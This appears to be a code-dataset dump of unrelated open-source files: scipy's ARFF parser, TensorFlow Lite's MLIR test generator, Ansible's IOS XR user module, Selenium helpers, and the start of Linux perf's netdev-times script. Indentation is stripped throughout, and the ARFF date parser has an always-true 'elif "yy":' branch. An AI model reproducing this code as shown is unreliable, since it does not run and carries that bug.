uattribute = attrtype.lower().strip()
if uattribute[0] == '{':
return 'nominal'
elif uattribute[:len('real')] == 'real':
return 'numeric'
elif uattribute[:len('integer')] == 'integer':
return 'numeric'
elif uattribute[:len('numeric')] == 'numeric':
return 'numeric'
elif uattribute[:len('string')] == 'string':
return 'string'
elif uattribute[:len('relational')] == 'relational':
return 'relational'
elif uattribute[:len('date')] == 'date':
return 'date'
else:
raise ParseArffError("unknown attribute %s" % uattribute)
def get_nominal(attribute):
"""If attribute is nominal, returns a list of the values"""
return attribute.split(',')
def read_data_list(ofile):
"""Read each line of the iterable and put it in a list."""
data = [next(ofile)]
if data[0].strip()[0] == '{':
raise ValueError("This looks like a sparse ARFF: not supported yet")
data.extend([i for i in ofile])
return data
def get_ndata(ofile):
"""Read the whole file to get number of data attributes."""
data = [next(ofile)]
loc = 1
if data[0].strip()[0] == '{':
raise ValueError("This looks like a sparse ARFF: not supported yet")
for i in ofile:
loc += 1
return loc
def maxnomlen(atrv):
"""Given a string containing a nominal type definition, returns the
string len of the biggest component.
A nominal type is defined as seomthing framed between brace ({}).
Parameters
----------
atrv : str
Nominal type definition
Returns
-------
slen : int
length of longest component
Examples
--------
maxnomlen("{floup, bouga, fl, ratata}") returns 6 (the size of
ratata, the longest nominal value).
>>> maxnomlen("{floup, bouga, fl, ratata}")
6
"""
nomtp = get_nom_val(atrv)
return max(len(i) for i in nomtp)
def get_nom_val(atrv):
"""Given a string containing a nominal type, returns a tuple of the
possible values.
A nominal type is defined as something framed between braces ({}).
Parameters
----------
atrv : str
Nominal type definition
Returns
-------
poss_vals : tuple
possible values
Examples
--------
>>> get_nom_val("{floup, bouga, fl, ratata}")
('floup', 'bouga', 'fl', 'ratata')
"""
r_nominal = re.compile('{(.+)}')
m = r_nominal.match(atrv)
if m:
return tuple(i.strip() for i in m.group(1).split(','))
else:
raise ValueError("This does not look like a nominal string")
def get_date_format(atrv):
r_date = re.compile(r"[Dd][Aa][Tt][Ee]\s+[\"']?(.+?)[\"']?$")
m = r_date.match(atrv)
if m:
pattern = m.group(1).strip()
# convert time pattern from Java's SimpleDateFormat to C's format
datetime_unit = None
if "yyyy" in pattern:
pattern = pattern.replace("yyyy", "%Y")
datetime_unit = "Y"
elif "yy":
pattern = pattern.replace("yy", "%y")
datetime_unit = "Y"
if "MM" in pattern:
pattern = pattern.replace("MM", "%m")
datetime_unit = "M"
if "dd" in pattern:
pattern = pattern.replace("dd", "%d")
datetime_unit = "D"
if "HH" in pattern:
pattern = pattern.replace("HH", "%H")
datetime_unit = "h"
if "mm" in pattern:
pattern = pattern.replace("mm", "%M")
datetime_unit = "m"
if "ss" in pattern:
pattern = pattern.replace("ss", "%S")
datetime_unit = "s"
if "z" in pattern or "Z" in pattern:
raise ValueError("Date type attributes with time zone not "
"supported, yet")
if datetime_unit is None:
raise ValueError("Invalid or unsupported date format")
return pattern, datetime_unit
else:
raise ValueError("Invalid or no date format")
def go_data(ofile):
"""Skip header.
the first next() call of the returned iterator will be the @data line"""
return itertools.dropwhile(lambda x: not r_datameta.match(x), ofile)
#----------------
# Parsing header
#----------------
def tokenize_attribute(iterable, attribute):
"""Parse a raw string in header (eg starts by @attribute).
Given a raw string attribute, try to get the name and type of the
attribute. Constraints:
* The first line must start with @attribute (case insensitive, and
space like characters before @attribute are allowed)
* Works also if the attribute is spread on multilines.
* Works if empty lines or comments are in between
Parameters
----------
attribute : str
the attribute string.
Returns
-------
name : str
name of the attribute
value : str
value of the attribute
next : str
next line to be parsed
Examples
--------
If attribute is a string defined in python as r"floupi real", will
return floupi as name, and real as value.
>>> iterable = iter([0] * 10) # dummy iterator
>>> tokenize_attribute(iterable, r"@attribute floupi real")
('floupi', 'real', 0)
If attribute is r"'floupi 2' real", will return 'floupi 2' as name,
and real as value.
>>> tokenize_attribute(iterable, r" @attribute 'floupi 2' real ")
('floupi 2', 'real', 0)
"""
sattr = attribute.strip()
mattr = r_attribute.match(sattr)
if mattr:
# atrv is everything after @attribute
atrv = mattr.group(1)
if r_comattrval.match(atrv):
name, type = tokenize_single_comma(atrv)
next_item = next(iterable)
elif r_wcomattrval.match(atrv):
name, type = tokenize_single_wcomma(atrv)
next_item = next(iterable)
else:
# Not sure we should support this, as it does not seem supported by
# weka.
raise ValueError("multi line not supported yet")
#name, type, next_item = tokenize_multilines(iterable, atrv)
else:
raise ValueError("First line unparsable: %s" % sattr)
if type == 'relational':
raise ValueError("relational attributes not supported yet")
return name, type, next_item
def tokenize_single_comma(val):
# XXX we match twice the same string (here and at the caller level). It is
# stupid, but it is easier for now...
m = r_comattrval.match(val)
if m:
try:
name = m.group(1).strip()
type = m.group(2).strip()
except IndexError:
raise ValueError("Error while tokenizing attribute")
else:
raise ValueError("Error while tokenizing single %s" % val)
return name, type
def tokenize_single_wcomma(val):
# XXX we match twice the same string (here and at the caller level). It is
# stupid, but it is easier for now...
m = r_wcomattrval.match(val)
if m:
try:
name = m.group(1).strip()
type = m.group(2).strip()
except IndexError:
raise ValueError("Error while tokenizing attribute")
else:
raise ValueError("Error while tokenizing single %s" % val)
return name, type
def read_header(ofile):
"""Read the header of the iterable ofile."""
i = next(ofile)
# Pass first comments
while r_comment.match(i):
i = next(ofile)
# Header is everything up to DATA attribute ?
relation = None
attributes = []
while not r_datameta.match(i):
m = r_headerline.match(i)
if m:
isattr = r_attribute.match(i)
if isattr:
name, type, i = tokenize_attribute(ofile, i)
attributes.append((name, type))
else:
isrel = r_relation.match(i)
if isrel:
relation = isrel.group(1)
else:
raise ValueError("Error parsing line %s" % i)
i = next(ofile)
else:
i = next(ofile)
return relation, attributes
#--------------------
# Parsing actual data
#--------------------
def safe_float(x):
"""given a string x, convert it to a float. If the stripped string is a ?,
return a Nan (missing value).
Parameters
----------
x : str
string to convert
Returns
-------
f : float
where float can be nan
Examples
--------
>>> safe_float('1')
1.0
>>> safe_float('1\\n')
1.0
>>> safe_float('?\\n')
nan
"""
if '?' in x:
return np.nan
else:
return float(x)
def safe_nominal(value, pvalue):
svalue = value.strip()
if svalue in pvalue:
return svalue
elif svalue == '?':
return svalue
else:
raise ValueError("%s value not in %s" % (str(svalue), str(pvalue)))
def safe_date(value, date_format, datetime_unit):
date_str = value.strip().strip("'").strip('"')
if date_str == '?':
return np.datetime64('NaT', datetime_unit)
else:
dt = datetime.datetime.strptime(date_str, date_format)
return np.datetime64(dt).astype("datetime64[%s]" % datetime_unit)
class MetaData(object):
"""Small container to keep useful informations on a ARFF dataset.
Knows about attributes names and types.
Examples
--------
::
data, meta = loadarff('iris.arff')
# This will print the attributes names of the iris.arff dataset
for i in meta:
print i
# This works too
meta.names()
# Getting attribute type
types = meta.types()
Notes
-----
Also maintains the list of attributes in order, i.e. doing for i in
meta, where meta is an instance of MetaData, will return the
different attribute names in the order they were defined.
"""
def __init__(self, rel, attr):
self.name = rel
# We need the dictionary to be ordered
# XXX: may be better to implement an ordered dictionary
self._attributes = {}
self._attrnames = []
for name, value in attr:
tp = parse_type(value)
self._attrnames.append(name)
if tp == 'nominal':
self._attributes[name] = (tp, get_nom_val(value))
elif tp == 'date':
self._attributes[name] = (tp, get_date_format(value)[0])
else:
self._attributes[name] = (tp, None)
def __repr__(self):
msg = ""
msg += "Dataset: %s\n" % self.name
for i in self._attrnames:
msg += "\t%s's type is %s" % (i, self._attributes[i][0])
if self._attributes[i][1]:
msg += ", range is %s" % str(self._attributes[i][1])
msg += '\n'
return msg
def __iter__(self):
return iter(self._attrnames)
def __getitem__(self, key):
return self._attributes[key]
def names(self):
"""Return the list of attribute names."""
return self._attrnames
def types(self):
"""Return the list of attribute types."""
attr_types = [self._attributes[name][0] for name in self._attrnames]
return attr_types
def loadarff(f):
"""
Read an arff file.
The data is returned as a record array, which can be accessed much like
a dictionary of numpy arrays. For example, if one of the attributes is
called 'pressure', then its first 10 data points can be accessed from the
``data`` record array like so: ``data['pressure'][0:10]``
Parameters
----------
f : file-like or str
File-like object to read from, or filename to open.
Returns
-------
data : record array
The data of the arff file, accessible by attribute names.
meta : `MetaData`
Contains information about the arff file such as name and
type of attributes, the relation (name of the dataset), etc...
Raises
------
ParseArffError
This is raised if the given file is not ARFF-formatted.
NotImplementedError
The ARFF file has an attribute which is not supported yet.
Notes
-----
This function should be able to read most arff files. Not
implemented functionality include:
* date type attributes
* string type attributes
It can read files with numeric and nominal attributes. It cannot read
files with sparse data ({} in the file). However, this function can
read files with missing data (? in the file), representing the data
points as NaNs.
Examples
--------
>>> from scipy.io import arff
>>> from cStringIO import StringIO
>>> content = \"\"\"
... @relation foo
... @attribute width numeric
... @attribute height numeric
... @attribute color {red,green,blue,yellow,black}
... @data
... 5.0,3.25,blue
... 4.5,3.75,green
... 3.0,4.00,red
... \"\"\"
>>> f = StringIO(content)
>>> data, meta = arff.loadarff(f)
>>> data
array([(5.0, 3.25, 'blue'), (4.5, 3.75, 'green'), (3.0, 4.0, 'red')],
dtype=[('width', '<f8'), ('height', '<f8'), ('color', '|S6')])
>>> meta
Dataset: foo
\twidth's type is numeric
\theight's type is numeric
\tcolor's type is nominal, range is ('red', 'green', 'blue', 'yellow', 'black')
"""
if hasattr(f, 'read'):
ofile = f
else:
ofile = open(f, 'rt')
try:
return _loadarff(ofile)
finally:
if ofile is not f: # only close what we opened
ofile.close()
def _loadarff(ofile):
# Parse the header file
try:
rel, attr = read_header(ofile)
except ValueError as e:
msg = "Error while parsing header, error was: " + str(e)
raise ParseArffError(msg)
# Check whether we have a string attribute (not supported yet)
hasstr = False
for name, value in attr:
type = parse_type(value)
if type == 'string':
hasstr = True
meta = MetaData(rel, attr)
# XXX The following code is not great
# Build the type descriptor descr and the list of convertors to convert
# each attribute to the suitable type (which should match the one in
# descr).
# This can be used once we want to support integer as integer values and
# not as numeric anymore (using masked arrays ?).
acls2dtype = {'real': float, 'integer': float, 'numeric': float}
acls2conv = {'real': safe_float,
'integer': safe_float,
'numeric': safe_float}
descr = []
convertors = []
if not hasstr:
for name, value in attr:
type = parse_type(value)
if type == 'date':
date_format, datetime_unit = get_date_format(value)
descr.append((name, "datetime64[%s]" % datetime_unit))
convertors.append(partial(safe_date, date_format=date_format,
datetime_unit=datetime_unit))
elif type == 'nominal':
n = maxnomlen(value)
descr.append((name, 'S%d' % n))
pvalue = get_nom_val(value)
convertors.append(partial(safe_nominal, pvalue=pvalue))
else:
descr.append((name, acls2dtype[type]))
convertors.append(safe_float)
#dc.append(acls2conv[type])
#sdescr.append((name, acls2sdtype[type]))
else:
# How to support string efficiently ? Ideally, we should know the max
# size of the string before allocating the numpy array.
raise NotImplementedError("String attributes not supported yet, sorry")
ni = len(convertors)
def generator(row_iter, delim=','):
# TODO: this is where we are spending times (~80%). I think things
# could be made more efficiently:
# - We could for example "compile" the function, because some values
# do not change here.
# - The function to convert a line to dtyped values could also be
# generated on the fly from a string and be executed instead of
# looping.
# - The regex are overkill: for comments, checking that a line starts
# by % should be enough and faster, and for empty lines, same thing
# --> this does not seem to change anything.
# We do not abstract skipping comments and empty lines for performances
# reason.
raw = next(row_iter)
while r_empty.match(raw) or r_comment.match(raw):
raw = next(row_iter)
# 'compiling' the range since it does not change
# Note, I have already tried zipping the converters and
# row elements and got slightly worse performance.
elems = list(range(ni))
row = raw.split(delim)
yield tuple([convertors[i](row[i]) for i in elems])
for raw in row_iter:
while r_comment.match(raw) or r_empty.match(raw):
raw = next(row_iter)
row = raw.split(delim)
yield tuple([convertors[i](row[i]) for i in elems])
a = generator(ofile)
# No error should happen here: it is a bug otherwise
data = np.fromiter(a, descr)
return data, meta
#-----
# Misc
#-----
def basic_stats(data):
nbfac = data.size * 1. / (data.size - 1)
return np.nanmin(data), np.nanmax(data), np.mean(data), np.std(data) * nbfac
def print_attribute(name, tp, data):
type = tp[0]
if type == 'numeric' or type == 'real' or type == 'integer':
min, max, mean, std = basic_stats(data)
print("%s,%s,%f,%f,%f,%f" % (name, type, min, max, mean, std))
else:
msg = name + ",{"
for i in range(len(tp[1])-1):
msg += tp[1][i] + ","
msg += tp[1][-1]
msg += "}"
print(msg)
def test_weka(filename):
data, meta = loadarff(filename)
print(len(data.dtype))
print(data.size)
for i in meta:
print_attribute(i, meta[i], data[i])
# make sure nose does not find this as a test
test_weka.__test__ = False
if __name__ == '__main__':
import sys
filename = sys.argv[1]
test_weka(filename)
| mit |
tensorflow/tensorflow | tensorflow/lite/experimental/mlir/testing/generate_examples.py | 2 | 9597 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Generates a series of test cases using MLIR-based conversion."""
# This is forked from `tensorflow/lite/testing/generate_examples.py`.
# TODO(b/136499575): Merge this back to TFLite codebase when open sourcing.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import sys
import tensorflow.compat.v1 as tf
from tensorflow.lite.experimental.mlir.testing import mlir_convert
# pylint: disable=unused-import
from tensorflow.lite.experimental.mlir.testing.op_tests.batchmatmul import make_batchmatmul_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.broadcast_args import make_broadcast_args_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.broadcast_gradient_args import make_broadcast_gradient_args_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.broadcast_to import make_broadcast_to_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.complex_abs import make_complex_abs_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.cond import make_cond_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.control_dep import make_control_dep_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.conv3d import make_conv3d_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.conv3d_transpose import make_conv3d_transpose_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.conv_bias_activation import make_conv_bias_relu6_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.cumsum import make_cumsum_tests
# Placeholder for make_dense_image_warp_tests import
from tensorflow.lite.experimental.mlir.testing.op_tests.dynamic_rnn import make_dynamic_rnn_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.einsum import make_einsum_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.identify_dilated_conv import make_identify_dilated_conv_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.identify_dilated_conv1d import make_identify_dilated_conv1d_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.imag import make_imag_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.irfft2d import make_irfft2d_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.is_finite import make_is_finite_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.max_pool_with_argmax import make_max_pool_with_argmax_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.parse_example import make_parse_example_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.pool3d import make_avg_pool3d_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.pool3d import make_max_pool3d_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.real import make_real_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.reciprocal import make_reciprocal_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.rfft import make_rfft_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.rfft2d import make_rfft2d_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.roll import make_roll_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.roll import make_roll_with_constant_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.segment_sum import make_segment_sum_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.shape_to_strided_slice import make_shape_to_strided_slice_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.softplus import make_softplus_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.static_hashtable import make_static_hashtable_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.static_rnn_with_control_flow_v2 import make_static_rnn_with_control_flow_v2_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.stft import make_stft_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.tensor_list_concat import make_tensor_list_concat_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.tensor_list_dynamic_shape import make_tensor_list_dynamic_shape_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.tensor_list_get_item import make_tensor_list_get_item_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.tensor_list_length import make_tensor_list_length_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.tensor_list_resize import make_tensor_list_resize_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.tensor_list_set_item import make_tensor_list_set_item_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.tensor_scatter_update import make_tensor_scatter_update_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.where_v2 import make_where_v2_tests
from tensorflow.lite.experimental.mlir.testing.op_tests.while_loop import make_while_tests
from tensorflow.lite.testing import generate_examples_lib
MLIR_CONVERTER_KNOWN_BUGS = {
# We need to support dynamic_rnn case.
r"unidirectional_sequence_rnn.*is_dynamic_rnn=True": "128997102",
r"unidirectional_sequence_lstm.*is_dynamic_rnn=True": "128997102",
# TODO(b/124314620): Test cases work with tf_tfl_translate binary
# but not TFLiteConverter interface.
# Concat & SpaceToDepth with uint8 doesn't work.
r"concat.*type=tf\.uint8": "124314620",
r"space_to_depth.*type=tf\.uint8": "124314620",
r"l2norm.*fully_quantize=True": "134594898",
# Below are not really a converter bug, but our kernels doesn't support
# int64.
r"div.*dtype=tf\.int64": "119126484",
r"floor_div.*dtype=tf\.int64": "119126484",
r"relu.*dtype=tf\.int64": "119126484",
r"squared_difference.*dtype=tf\.int64": "119126484",
# Post-training quantization support missing for below op in mlir.
r"prelu.*fully_quantize=True": "156112683",
# ResizeBilinear op kernel supports only float32 and quantized 8-bit
# integers.
r"resize_bilinear.*dtype=tf\.int32": "156569626",
}
# Disable GPU for now since we are just testing in TF against CPU reference
# value and creating non-device-specific graphs to export.
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
parser = argparse.ArgumentParser(description="Script to generate TFLite tests.")
parser.add_argument("output_path",
help="Directory where the outputs will be go.")
parser.add_argument(
"--zip_to_output",
type=str,
help="Particular zip to output.",
required=True)
parser.add_argument(
"--known_bugs_are_errors",
action="store_true",
help=("If a particular model is affected by a known bug,"
" count it as a converter error."))
parser.add_argument(
"--ignore_converter_errors",
action="store_true",
help="Raise an exception if any converter error is encountered.")
parser.add_argument(
"--save_graphdefs",
action="store_true",
help="Include intermediate graphdefs in the output zip files.")
parser.add_argument(
"--run_with_flex",
action="store_true",
help="Whether the TFLite Flex converter is being used.")
parser.add_argument(
"--make_edgetpu_tests",
action="store_true",
help="Whether to generate test cases for edgetpu.")
parser.add_argument(
"--make_forward_compat_test",
action="store_true",
help="Make tests by setting TF forward compatibility horizon to the future")
parser.add_argument(
"--test_sets",
type=str,
help=("Comma-separated list of test set names to generate. "
"If not specified, a test set is selected by parsing the name of "
"'zip_to_output' file."))
parser.add_argument(
"--mlir_quantizer",
action="store_true",
help=("Whether the new MLIR quantizer is being used."))
def main(unused_args):
options = generate_examples_lib.Options()
options.output_path = FLAGS.output_path
options.zip_to_output = FLAGS.zip_to_output
options.known_bugs_are_errors = FLAGS.known_bugs_are_errors
options.ignore_converter_errors = FLAGS.ignore_converter_errors
options.save_graphdefs = FLAGS.save_graphdefs
options.run_with_flex = FLAGS.run_with_flex
options.make_edgetpu_tests = FLAGS.make_edgetpu_tests
options.tflite_convert_function = mlir_convert.mlir_convert
options.known_bugs = MLIR_CONVERTER_KNOWN_BUGS
options.make_forward_compat_test = FLAGS.make_forward_compat_test
options.use_experimental_converter = True
options.mlir_quantizer = FLAGS.mlir_quantizer
if FLAGS.test_sets:
test_sets = FLAGS.test_sets.split(",")
generate_examples_lib.generate_multi_set_examples(options, test_sets)
else:
generate_examples_lib.generate_examples(options)
if __name__ == "__main__":
FLAGS, unparsed = parser.parse_known_args()
if unparsed:
print("Usage: %s <path out> <zip file to generate>")
exit(1)
else:
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| apache-2.0 |
napkindrawing/ansible | lib/ansible/modules/network/iosxr/iosxr_user.py | 14 | 9858 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Ansible by Red Hat, inc
#
# This file is part of Ansible by Red Hat
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = """
---
module: iosxr_user
version_added: "2.4"
author: "Trishna Guha (@trishnag)"
short_description: Manage the collection of local users on Cisco IOS XR device
description:
- This module provides declarative management of the local usernames
configured on network devices. It allows playbooks to manage
either individual usernames or the collection of usernames in the
current running config. It also supports purging usernames from the
configuration that are not explicitly defined.
options:
users:
description:
- The set of username objects to be configured on the remote
Cisco IOS XR device. The list entries can either be the username
or a hash of username and properties. This argument is mutually
exclusive with the C(name) argument, alias C(collection).
name:
description:
- The username to be configured on the Cisco IOS XR device.
This argument accepts a string value and is mutually exclusive
with the C(collection) argument.
Please note that this option is not same as C(provider username).
password:
description:
- The password to be configured on the Cisco IOS XR device. The
password needs to be provided in clear and it will be encrypted
on the device.
Please note that this option is not same as C(provider password).
update_password:
description:
- Since passwords are encrypted in the device running config, this
argument will instruct the module when to change the password. When
set to C(always), the password will always be updated in the device
and when set to C(on_create) the password will be updated only if
the username is created.
default: always
choices: ['on_create', 'always']
group:
description:
- Configures the group for the username in the
device running configuration. The argument accepts a string value
defining the group name. This argument does not check if the group
has been configured on the device, alias C(role).
purge:
description:
- Instructs the module to consider the
resource definition absolute. It will remove any previously
configured usernames on the device with the exception of the
`admin` user (the current defined set of users).
type: bool
default: false
state:
description:
- Configures the state of the username definition
as it relates to the device operational configuration. When set
to I(present), the username(s) should be configured in the device active
configuration and when set to I(absent) the username(s) should not be
in the device active configuration
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: create a new user
iosxr_user:
name: ansible
password: test
state: present
- name: remove all users except admin
iosxr_user:
purge: yes
- name: set multiple users to group sys-admin
iosxr_user:
users:
- name: netop
- name: netend
group: sysadmin
state: present
- name: Change Password for User netop
iosxr_user:
name: netop
password: "{{ new_password }}"
update_password: always
state: present
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- username ansible secret password group sysadmin
- username admin secret admin
"""
import re
from functools import partial
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.iosxr import get_config, load_config
from ansible.module_utils.six import iteritems
from ansible.module_utils.iosxr import iosxr_argument_spec, check_args
def map_obj_to_commands(updates, module):
commands = list()
state = module.params['state']
update_password = module.params['update_password']
def needs_update(want, have, x):
return want.get(x) and (want.get(x) != have.get(x))
def add(command, want, x):
command.append('username %s %s' % (want['name'], x))
for update in updates:
want, have = update
if want['state'] == 'absent':
commands.append('no username %s' % want['name'])
continue
if needs_update(want, have, 'group'):
add(commands, want, 'group %s' % want['group'])
if needs_update(want, have, 'password'):
if update_password == 'always' or not have:
add(commands, want, 'secret %s' % want['password'])
return commands
def parse_group(data):
match = re.search(r'\n group (\S+)', data, re.M)
if match:
return match.group(1)
def map_config_to_obj(module):
data = get_config(module, flags=['username'])
match = re.findall(r'^username (\S+)', data, re.M)
if not match:
return list()
instances = list()
for user in set(match):
regex = r'username %s .+$' % user
cfg = re.findall(regex, data, re.M)
cfg = '\n'.join(cfg)
obj = {
'name': user,
'state': 'present',
'password': None,
'group': parse_group(cfg)
}
instances.append(obj)
return instances
def get_param_value(key, item, module):
# if key doesn't exist in the item, get it from module.params
if not item.get(key):
value = module.params[key]
# if key does exist, do a type check on it to validate it
else:
value_type = module.argument_spec[key].get('type', 'str')
type_checker = module._CHECK_ARGUMENT_TYPES_DISPATCHER[value_type]
type_checker(item[key])
value = item[key]
# validate the param value (if validator func exists)
validator = globals().get('validate_%s' % key)
if all((value, validator)):
validator(value, module)
return value
def map_params_to_obj(module):
users = module.params['users']
if not users:
if not module.params['name'] and module.params['purge']:
return list()
elif not module.params['name']:
module.fail_json(msg='username is required')
else:
collection = [{'name': module.params['name']}]
else:
collection = list()
for item in users:
if not isinstance(item, dict):
collection.append({'name': item})
elif 'name' not in item:
module.fail_json(msg='name is required')
else:
collection.append(item)
objects = list()
for item in collection:
get_value = partial(get_param_value, item=item, module=module)
item['password'] = get_value('password')
item['group'] = get_value('group')
item['state'] = get_value('state')
objects.append(item)
return objects
def update_objects(want, have):
updates = list()
for entry in want:
item = next((i for i in have if i['name'] == entry['name']), None)
if all((item is None, entry['state'] == 'present')):
updates.append((entry, {}))
elif item:
for key, value in iteritems(entry):
if value and value != item[key]:
updates.append((entry, item))
return updates
def main():
""" main entry point for module execution
"""
argument_spec = dict(
users=dict(type='list', aliases=['collection']),
name=dict(),
password=dict(no_log=True),
update_password=dict(default='always', choices=['on_create', 'always']),
group=dict(aliases=['role']),
purge=dict(type='bool', default=False),
state=dict(default='present', choices=['present', 'absent'])
)
argument_spec.update(iosxr_argument_spec)
mutually_exclusive = [('name', 'users')]
module = AnsibleModule(argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
result = {'changed': False}
want = map_params_to_obj(module)
have = map_config_to_obj(module)
commands = map_obj_to_commands(update_objects(want, have), module)
if module.params['purge']:
want_users = [x['name'] for x in want]
have_users = [x['name'] for x in have]
for item in set(have_users).difference(want_users):
if item != 'admin':
commands.append('no username %s' % item)
result['commands'] = commands
result['warnings'] = warnings
if 'no username admin' in commands:
module.fail_json(msg='cannot delete the `admin` account')
if commands:
if not module.check_mode:
load_config(module, commands, result['warnings'], commit=True)
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
lowitty/selenium | com/ericsson/xn/commons/funcutils.py | 1 | 2749 | # -*- coding: utf-8 -*-
from time import sleep
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import StaleElementReferenceException
def find_single_widget(driver, wait_time, list_identifier):
return WebDriverWait(driver, wait_time).until(EC.presence_of_element_located(list_identifier))
def find_all_widgets(driver, wait_time, list_identifier):
return WebDriverWait(driver, wait_time).until(EC.presence_of_all_elements_located(list_identifier))
def wait_until_text_shown_up(driver, wait_time, list_identifier, text):
return WebDriverWait(driver, wait_time).until(EC.text_to_be_present_in_element_value(list_identifier, text))
def get_widget_ignore_refrence_error(driver, list_identifier, sleep_time=.5, wait_time=10):
try:
return WebDriverWait(driver, wait_time).until(EC.presence_of_element_located(list_identifier))
except StaleElementReferenceException:
# this exception happens when widget distroyed and re-build again, sleep while will OK
sleep(sleep_time)
return WebDriverWait(driver, wait_time).until(EC.presence_of_element_located(list_identifier))
def is_pair_nes(ne, cne):
# list_EPG = ["SGW", "PGW"]
# list_MME = ["SGSN", "MME"]
if ne == cne:
return False
if "MME" == ne and "SGSN" == cne:
return True
if "SGSN" == ne and "MME" == cne:
return True
if "SGW" == ne and "PGW" == cne:
return True
if "PGW" == ne and "SGW" == cne:
return True
if "LTEHSS" == ne and "IMSHSS" == cne:
return True
if "IMSHSS" == ne and "LTEHSS" == cne:
return True
return False
def ne_type_index_add_ne_page(ne_type):
dic = {
"3GSGSN": 1,
"GGSN": 2,
"HLR": 3,
"IMSHSS": 4,
"LTEHSS": 5,
"MME": 6,
"MSC": 7,
"MTAS": 8,
"OCGAS": 9,
"PCSCF": 10,
"SGW": 11,
"PGW": 12,
"SBC": 13,
"SGSN": 14
}
if dic.has_key(ne_type):
return dic[ne_type]
return None
def ne_category_by_ne_type(ne_type):
category = {
'SGW': '4G',
'PGW': '4G',
'SGSN': '3G',
'MME': '4G',
'SBC': 'IMS',
'OCGAS': 'IMS',
'IMSHSS': 'IMS',
'LTEHSS': '4G'
}
return category[ne_type]
"""
def wait_until_text_is_not_none(widget, timeout, interval=.25):
end_time = datetime.now() + timedelta(seconds=timeout)
while datetime.now() < end_time:
text = widget.get_attribute('innerHTML').encode('utf-8').strip()
if not '' == text:
return text
time.sleep(interval)
return None
"""
| mit |
munoz0raul/linux-toradex_ACM_iMX6 | tools/perf/scripts/python/netdev-times.py | 11271 | 15048 | # Display a process of packets and processed time.
# It helps us to investigate networking or network device.
#
# options
# tx: show only tx chart
# rx: show only rx chart
# dev=: show only thing related to specified device
# debug: work with debug mode. It shows buffer status.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
all_event_list = []; # insert all tracepoint event related with this script
irq_dic = {}; # key is cpu and value is a list which stacks irqs
# which raise NET_RX softirq
net_rx_dic = {}; # key is cpu and value include time of NET_RX softirq-entry
# and a list which stacks receive
receive_hunk_list = []; # a list which include a sequence of receive events
rx_skb_list = []; # received packet list for matching
# skb_copy_datagram_iovec
buffer_budget = 65536; # the budget of rx_skb_list, tx_queue_list and
# tx_xmit_list
of_count_rx_skb_list = 0; # overflow count
